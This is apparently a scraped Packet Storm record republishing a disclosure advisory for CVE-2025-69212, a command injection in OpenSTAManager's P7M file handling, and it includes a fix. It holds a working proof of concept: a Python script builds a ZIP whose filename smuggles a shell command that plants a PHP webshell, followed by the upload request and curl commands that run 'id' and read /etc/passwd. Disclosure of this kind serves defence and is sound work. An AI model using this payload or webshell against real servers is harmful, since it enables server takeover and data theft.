{“lastseen”:”2026-04-13T15:48:09″,”description”:”OpenSTAManager versions 2.9.8 and below suffer from a command injection vulnerability via the P7M file processing functionality…”,”published”:”2026-04-13T00:00:00″,”modified”:”2026-04-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 OpenSTAManager 2.9.8 Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:218760″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-69212″],”sourceData”:”# CVE-2025-69212: OpenSTAManager has an OS Command Injection in P7M File Processing\\n \\n ## Overview\\n \\n | Field | Details |\\n |—|—|\\n | **CVE ID** | [CVE-2025-69212](https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-69212) |\\n | **Severity** | CRITICAL |\\n | **Advisory** | [View Advisory](https:\/\/github.com\/devcode-it\/openstamanager\/security\/advisories\/GHSA-25fp-8w8p-mx36) |\\n | **Discovered by** | [Lukasz Rybak](https:\/\/github.com\/lukasz-rybak) |\\n \\n ## Affected Products\\n \\n – **devcode-it\/openstamanager** (versions: \\u003c= 2.9.8)\\n \\n \\n ## CWE Classification\\n \\n – CWE-78: Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)\\n \\n ## Details\\n \\n ## Summary\\n A critical OS Command Injection vulnerability exists in the P7M (signed XML) file decoding functionality. An authenticated attacker can upload a ZIP file containing a .p7m file with a malicious filename to execute arbitrary system commands on the server.\\n \\n \\n ## Vulnerable Code\\n **File:** `src\/Util\/XML.php:100`\\n \\n “`php\\n public static function decodeP7M($file)\\n {\\n $directory = pathinfo($file, PATHINFO_DIRNAME);\\n $content = file_get_contents($file);\\n \\n $output_file = $directory.’\/’.basename($file, ‘.p7m’);\\n \\n try {\\n if (function_exists(‘exec’)) {\\n \/\/ VULNERABLE – No input sanitization!\\n exec(‘openssl smime -verify -noverify -in \\”‘.$file.’\\” -inform DER -out \\”‘.$output_file.’\\”‘, $output, $cmd);\\n “`\\n \\n **The Problem:**\\n – The `$file` parameter is passed directly into `exec()` without sanitization\\n – Although wrapped in double quotes, an attacker can escape them\\n – The filename comes from uploaded ZIP archives (user-controlled)\\n \\n ## Attack Vector\\n \\n ### Entry Points:\\n 1. **plugins\/importFE_ZIP\/actions.php:126** (when automatic import is enabled)\\n “`php\\n foreach ($files_xml as $xml) {\\n if (string_ends_with($xml, ‘.p7m’)) {\\n $file = XML::decodeP7M($directory.’\/’.$xml); \/\/ $xml from ZIP!\\n “`\\n \\n 2. **plugins\/importFE\/src\/FatturaElettronica.php:56** (constructor)\\n “`php\\n if (string_ends_with($name, ‘.p7m’)) {\\n $file = XML::decodeP7M($this-\\u003efile); \/\/ $name from user input!\\n “`\\n \\n ### Attack Flow:\\n 1. Attacker creates ZIP with malicious filename\\n 2. Upload ZIP via importFE_ZIP plugin\\n 3. Application extracts ZIP and iterates files\\n 4. For `.p7m` files, `decodeP7M()` is called\\n 5. Malicious filename is injected into `exec()` command\\n 6. Arbitrary command executes as web server user\\n \\n ## Proof of Concept\\n \\n **\u26a0\ufe0f IMPORTANT NOTE:** PHP’s `ZipArchive::extractTo()` splits filenames on `\/` character. Payload must NOT contain `\/` in commands. Use `cd directory \\u0026\\u0026 command` instead of absolute paths.\\n \\n ### Step 1: Create Malicious ZIP\\n \\n “`python\\n import zipfile\\n \\n cmd = \\”cd files \\u0026\\u0026 echo ‘\\u003c?php system($_GET[\\\\\\”c\\\\\\”]); ?\\u003e’ \\u003e SHELL.php\\”\\n malicious_filename = f’invoice.p7m\\”;{cmd};echo \\”.p7m’\\n \\n with zipfile.ZipFile(‘exploit.zip’, ‘w’) as zf:\\n zf.writestr(malicious_filename, b\\”DUMMY_P7M_CONTENT\\”)\\n “`\\n \\n ### Step 2: Upload ZIP\\n \\n “`http\\n POST \/actions.php HTTP\/1.1\\n Host: localhost:8081\\n Content-Type: multipart\/form-data; boundary=—-WebKitFormBoundaryBKunENXxjEx5VrRc\\n Cookie: PHPSESSID=10fcc3c3cdccf2466ada216d5839084b\\n \\n ——WebKitFormBoundaryBKunENXxjEx5VrRc\\n Content-Disposition: form-data; name=\\”blob1\\”; filename=\\”exploit.zip\\”\\n Content-Type: application\/zip\\n \\n [ZIP CONTENT]\\n ——WebKitFormBoundaryBKunENXxjEx5VrRc–\\n Content-Disposition: form-data; name=\\”op\\”\\n \\n save\\n \\n ——WebKitFormBoundaryBKunENXxjEx5VrRc\\n Content-Disposition: form-data; name=\\”id_module\\”\\n \\n 14\\n ——WebKitFormBoundaryBKunENXxjEx5VrRc\\n Content-Disposition: form-data; name=\\”id_plugin\\”\\n \\n 48\\n ——WebKitFormBoundaryBKunENXxjEx5VrRc–\\n “`\\n \\u003cimg width=\\”2539\\” height=\\”809\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/f39cf6ad-9e8d-41de-866e-e01ec2064fd1\\” \/\\u003e\\n \\n \\u003cimg width=\\”1543\\” height=\\”659\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/41fbd038-0bce-4b1c-bdc3-8ddcf3bf13be\\” \/\\u003e\\n \\n ### Step 3: Exploitation Result\\n \\n **Response (500 error is expected – XML parsing fails AFTER command execution):**\\n “`http\\n HTTP\/1.1 500 Internal Server Error\\n {\\”error\\”:{\\”type\\”:\\”Exception\\”,\\”message\\”:\\”Start tag expected, ‘\\u003c’ not found\\”}}\\n “`\\n \\n **Verification – Webshell Created:**\\n \\n \\u003cimg width=\\”1111\\” height=\\”239\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/d2e36cf3-c438-4509-be46-36d5c6f3e0d1\\” \/\\u003e\\n \\n ### Step 4: Remote Code Execution\\n \\n **Webshell is publicly accessible without authentication:**\\n \\n “`bash\\n $ curl \\”http:\/\/localhost:8081\/files\/SHELL.php?c=id\\”\\n uid=33(www-data) gid=33(www-data) groups=33(www-data)\\n \\n $ curl \\”http:\/\/localhost:8081\/files\/SHELL.php?c=cat+\/etc\/passwd\\”\\n [Full \/etc\/passwd output]\\n “`\\n \\u003cimg width=\\”698\\” height=\\”475\\” alt=\\”image\\” src=\\”https:\/\/github.com\/user-attachments\/assets\/7ee4630b-95a8-450c-bdce-d6f703c8168d\\” \/\\u003e\\n \\n \\n ## Impact\\n \\n – **Remote Code Execution:** Full server compromise\\n – **Data Exfiltration:** Access to all application data and database\\n – **Privilege Escalation:** Potential escalation if web server runs with elevated privileges\\n – **Persistence:** Install backdoors and maintain access\\n – **Lateral Movement:** Pivot to other systems on the network\\n \\n ## Prerequisites\\n \\n – Authenticated user with access to invoice import functionality\\n \\n ## Remediation\\n \\n ### Input Sanitization\\n \\n “`php\\n public static function decodeP7M($file)\\n {\\n \/\/ Validate that file path doesn’t contain shell metacharacters\\n if (preg_match(‘\/[;\\u0026|`$(){}\\\\\\\\[\\\\\\\\]\\u003c\\u003e]\/’, $file)) {\\n throw new \\\\Exception(‘Invalid file path’);\\n }\\n \\n \/\/ Better: use escapeshellarg()\\n $safe_file = escapeshellarg($file);\\n $safe_output = escapeshellarg($output_file);\\n \\n exec(\\”openssl smime -verify -noverify -in $safe_file -inform DER -out $safe_output\\”, $output, $cmd);\\n }\\n “`\\n or\\n \\n ### Validate Filename Before Processing\\n \\n “`php\\n \/\/ In the upload handler, validate filenames from ZIP\\n foreach ($files_xml as $xml) {\\n \/\/ Only allow alphanumeric, dots, dashes, underscores\\n if (!preg_match(‘\/^[a-zA-Z0-9._-]+$\/’, $xml)) {\\n continue; \/\/ Skip invalid filenames\\n }\\n \\n if (string_ends_with($xml, ‘.p7m’)) {\\n $file = XML::decodeP7M($directory.’\/’.$xml);\\n }\\n }\\n “`\\n \\n \\n ## Credit\\n Discovered by: \u0141ukasz Rybak\\n \\n ## References\\n \\n – https:\/\/github.com\/devcode-it\/openstamanager\/security\/advisories\/GHSA-25fp-8w8p-mx36\\n – https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2025-69212\\n – https:\/\/github.com\/advisories\/GHSA-25fp-8w8p-mx36\\n \\n \\n ## Disclaimer\\n \\n This CVE was responsibly disclosed following coordinated vulnerability disclosure practices. The information provided here is for educational and defensive purposes only.”,”sourceHref”:”https:\/\/packetstorm.news\/download\/218760″,”cvss”:{“score”:9.4,”severity”:”CRITICAL”,”vector”:”CVSS:4.0\/AV:N\/AC:L\/AT:N\/PR:L\/UI:N\/VC:H\/SC:H\/VI:H\/SI:H\/VA:H\/SA:H”,”version”:”4.0″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/218760\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-04-13T15:48:09″,”description”:”OpenSTAManager versions 2.9.8 and below suffer from a command injection vulnerability via the P7M file processing functionality…”,”published”:”2026-04-13T00:00:00″,”modified”:”2026-04-13T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 OpenSTAManager 2.9.8 Command Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:218760″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-69212″],”sourceData”:”# CVE-2025-69212: OpenSTAManager has an…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,131,12,13,53,7,11,5],"class_list":["post-46316","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-94","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n